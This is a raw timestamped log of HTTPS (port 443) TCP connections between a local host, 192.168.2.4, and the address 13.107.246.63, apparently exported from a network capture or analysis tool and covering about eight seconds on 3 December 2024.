                                                                                                            Dec 3, 2024 10:06:30.153592110 CET49813443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.153606892 CET4434981313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.372088909 CET4434980913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.372143984 CET4434980913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.372200966 CET49809443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.372406006 CET49809443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.372422934 CET4434980913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.372436047 CET49809443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.372442961 CET4434980913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.375181913 CET49814443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.375214100 CET4434981413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.375297070 CET49814443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.375442982 CET49814443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.375457048 CET4434981413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.428522110 CET4434981013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.428597927 CET4434981013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.428662062 CET49810443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.428761005 CET49810443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.428766012 CET4434981013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.428776026 CET49810443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.428778887 CET4434981013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.431356907 CET49815443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.431371927 CET4434981513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.431435108 CET49815443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.431535959 CET49815443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.431551933 CET4434981513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.444638014 CET4434981113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.444699049 CET4434981113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.444756031 CET49811443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.445202112 CET49811443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.445209026 CET4434981113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.445224047 CET49811443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.445228100 CET4434981113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.448378086 CET49816443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.448426008 CET4434981613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:30.448503017 CET49816443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.448612928 CET49816443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:30.448626041 CET4434981613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:31.879102945 CET4434981213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:31.883830070 CET49812443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:31.883858919 CET4434981213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:31.884279013 CET49812443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:31.884284019 CET4434981213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:31.940320969 CET4434981313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:31.943305969 CET49813443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:31.943331003 CET4434981313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:31.947160959 CET49813443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:31.947168112 CET4434981313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.154920101 CET4434981413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.162388086 CET49814443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.162420034 CET4434981413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.162868023 CET49814443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.162872076 CET4434981413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.278537989 CET4434981513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.295715094 CET4434981613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.319555998 CET49815443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.323292971 CET4434981213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.323362112 CET4434981213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.323407888 CET49812443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.334156990 CET49816443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.334178925 CET4434981613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.334182024 CET49815443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.334193945 CET4434981513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.334747076 CET49816443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.334753990 CET4434981613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.334897041 CET49815443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.334901094 CET4434981513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.335083961 CET49812443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.335103035 CET4434981213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.335114002 CET49812443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.335119963 CET4434981213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.338500977 CET49817443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.338541031 CET4434981713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.338646889 CET49817443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.338748932 CET49817443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.338764906 CET4434981713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.384509087 CET4434981313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.384566069 CET4434981313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.384609938 CET49813443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.384722948 CET49813443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.384740114 CET4434981313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.384749889 CET49813443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.384754896 CET4434981313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.387840033 CET49818443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.387873888 CET4434981813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.387929916 CET49818443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.388184071 CET49818443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.388196945 CET4434981813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.603749990 CET4434981413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.603825092 CET4434981413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.603957891 CET49814443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.604178905 CET49814443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.604196072 CET4434981413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.604207039 CET49814443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.604212046 CET4434981413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.606878996 CET49819443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.606908083 CET4434981913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.606986046 CET49819443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.607129097 CET49819443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.607142925 CET4434981913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.731376886 CET4434981513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.731451988 CET4434981513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.731503010 CET49815443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.731621027 CET49815443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.731645107 CET4434981513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.731657982 CET49815443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.731662989 CET4434981513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.733741999 CET49820443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.733772993 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.733838081 CET49820443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.733959913 CET49820443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.733978033 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.749574900 CET4434981613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.749633074 CET4434981613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.749681950 CET49816443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.749773026 CET49816443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.749788046 CET4434981613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.749804020 CET49816443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.749809027 CET4434981613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.751640081 CET49821443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.751667023 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:32.751746893 CET49821443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.751863003 CET49821443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:32.751877069 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.182661057 CET4434981713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.183130026 CET49817443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.183156967 CET4434981713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.183561087 CET49817443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.183566093 CET4434981713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.232583046 CET4434981813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.240358114 CET49818443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.240377903 CET4434981813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.240799904 CET49818443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.240803957 CET4434981813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.386827946 CET4434981913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.390842915 CET49819443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.390861034 CET4434981913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.391207933 CET49819443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.391212940 CET4434981913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.466728926 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.470910072 CET49821443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.470928907 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.471246004 CET49821443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.471251965 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.522047043 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.524262905 CET49820443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.524282932 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.524574041 CET49820443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.524585009 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.643672943 CET4434981713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.643693924 CET4434981713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.643745899 CET4434981713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.643754959 CET49817443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.643790007 CET49817443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.653476954 CET49817443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.653491974 CET4434981713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.653520107 CET49817443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.653525114 CET4434981713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.688514948 CET4434981813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.688601017 CET4434981813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.688838959 CET49818443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.696238041 CET49818443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.696260929 CET4434981813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.696290970 CET49818443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.696295977 CET4434981813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.700885057 CET49822443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.700927019 CET4434982213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.700990915 CET49822443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.701844931 CET49823443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.701875925 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.701992035 CET49822443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.702004910 CET4434982213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.702022076 CET49823443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.702081919 CET49823443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.702100992 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.831389904 CET4434981913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.831449032 CET4434981913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.831499100 CET49819443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.836714983 CET49819443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.836724043 CET4434981913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.836733103 CET49819443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.836735964 CET4434981913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.854156017 CET49824443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.854192972 CET4434982413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.854270935 CET49824443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.854398012 CET49824443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.854413986 CET4434982413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.906913996 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.906944036 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.907041073 CET49821443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.907054901 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.907099009 CET49821443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.911685944 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.911736012 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.911783934 CET49821443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.931755066 CET49821443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.931765079 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.931773901 CET49821443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.931778908 CET4434982113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.945022106 CET49825443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.945061922 CET4434982513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.945164919 CET49825443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.945677042 CET49825443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.945697069 CET4434982513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.974103928 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.974121094 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.974176884 CET49820443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.974193096 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.974687099 CET49820443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.974701881 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.974710941 CET49820443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.974824905 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.974854946 CET4434982013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.974895954 CET49820443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.980993986 CET49826443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.981008053 CET4434982613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:34.981106997 CET49826443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.981254101 CET49826443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:34.981265068 CET4434982613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.485542059 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.486905098 CET49823443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.486926079 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.487371922 CET49823443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.487376928 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.549808979 CET4434982213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.550776005 CET49822443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.550790071 CET4434982213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.551073074 CET49822443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.551079035 CET4434982213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.633750916 CET4434982413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.634325027 CET49824443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.634340048 CET4434982413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.634895086 CET49824443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.634901047 CET4434982413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.725145102 CET4434982513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.726715088 CET49825443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.726749897 CET4434982513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.727108955 CET49825443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.727116108 CET4434982513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.825476885 CET4434982613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.826069117 CET49826443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.826077938 CET4434982613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.826442003 CET49826443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.826446056 CET4434982613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.934901953 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.934921026 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.935091972 CET49823443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.935112000 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.935221910 CET49823443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.935235977 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.935244083 CET49823443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.935369015 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.935400963 CET4434982313.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.935441017 CET49823443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.937998056 CET49827443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.938030958 CET4434982713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:36.938101053 CET49827443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.938239098 CET49827443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:36.938256025 CET4434982713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.003202915 CET4434982213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.003268003 CET4434982213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.003371954 CET49822443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.003937960 CET49822443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.003937960 CET49822443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.003956079 CET4434982213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.003964901 CET4434982213.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.006815910 CET49828443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.006858110 CET4434982813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.006943941 CET49828443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.007153988 CET49828443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.007167101 CET4434982813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.078753948 CET4434982413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.078802109 CET4434982413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.078958035 CET49824443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.079026937 CET49824443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.079035997 CET4434982413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.079046965 CET49824443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.079051018 CET4434982413.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.081625938 CET49829443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.081648111 CET4434982913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.081742048 CET49829443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.081887960 CET49829443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.081899881 CET4434982913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.169821978 CET4434982513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.173111916 CET4434982513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.173280954 CET49825443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.173280954 CET49825443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.173280954 CET49825443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.175226927 CET49830443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.175260067 CET4434983013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.175328016 CET49830443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.175474882 CET49830443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.175486088 CET4434983013.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.279333115 CET4434982613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.282727003 CET4434982613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.282787085 CET49826443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.282864094 CET49826443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.282867908 CET4434982613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.282896996 CET49826443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.282901049 CET4434982613.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.287375927 CET49831443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.287404060 CET4434983113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.287461996 CET49831443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.287591934 CET49831443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.287605047 CET4434983113.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:37.475805044 CET49825443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:37.475819111 CET4434982513.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:38.652745008 CET4434982713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:38.654809952 CET49827443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:38.654834032 CET4434982713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:38.655252934 CET49827443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:38.655258894 CET4434982713.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:38.787230015 CET4434982813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:38.787847996 CET49828443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:38.787878990 CET4434982813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:38.788311005 CET49828443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:38.788316011 CET4434982813.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:38.926045895 CET4434982913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:38.926620007 CET49829443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:38.926649094 CET4434982913.107.246.63192.168.2.4
                                                                                                            Dec 3, 2024 10:06:38.926939964 CET49829443192.168.2.413.107.246.63
                                                                                                            Dec 3, 2024 10:06:38.926944971 CET4434982913.107.246.63192.168.2.4
